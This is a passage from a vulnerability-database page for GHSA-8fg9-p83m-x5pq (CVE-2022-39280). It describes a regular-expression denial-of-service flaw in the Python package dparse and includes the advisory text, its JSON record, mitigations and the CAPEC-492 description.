  "summary": "jsonata: Malicious inputs to \"$toMillis\" function can cause resource exhaustion"
}

GHSA-8FG9-P83M-X5PQ

Vulnerability from github – Published: 2022-09-27 15:28 – Updated: 2024-11-18 16:26
VLAI
Summary
ReDoS issue in dparse
Details

Impact

dparse versions prior to 0.5.1 contain a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

All users parsing index server URLs with dparse are impacted by this vulnerability.

Patches

The Patch is applied in the 0.5.2 version, all users are recommended to upgrade as soon as possible.

Workarounds

Avoid passing index server URLs in the source file to be parsed.

References

https://github.com/pyupio/dparse/tree/security/remove-intensive-regex

For more information

If you have any questions or comments about this advisory: * Email us at support@pyup.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "dparse"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-39280"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-09-27T15:28:00Z",
    "nvd_published_at": "2022-10-06T18:16:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\ndparse versions prior to 0.5.1 contain a regular expression that is vulnerable to [ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) (Regular Expression Denial of Service).\n\nAll users parsing index server URLs with dparse are impacted by this vulnerability.\n\n### Patches\nThe Patch is applied in the `0.5.2` version, all users are recommended to upgrade as soon as possible.\n\n### Workarounds\nAvoid passing index server URLs in the source file to be parsed.\n\n### References\n[https://github.com/pyupio/dparse/tree/security/remove-intensive-regex](https://github.com/pyupio/dparse/tree/security/remove-intensive-regex)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [support@pyup.io](mailto:support@pyup.io)\n",
  "id": "GHSA-8fg9-p83m-x5pq",
  "modified": "2024-11-18T16:26:27Z",
  "published": "2022-09-27T15:28:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyupio/dparse/security/advisories/GHSA-8fg9-p83m-x5pq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39280"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyupio/dparse/commit/8c990170bbd6c0cf212f1151e9025486556062d5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyupio/dparse/commit/d87364f9db9ab916451b1b036cfeb039e726e614"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/dparse/PYSEC-2022-301.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyupio/dparse"
    },
    {
      "type": "WEB",
      "url": "https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "ReDoS issue in dparse"
}

Mitigation
Architecture and Design

Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.

Mitigation
System Configuration

Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.

Mitigation
Implementation

Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.

Mitigation
Implementation

Limit the length of the input that the regular expression will process.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.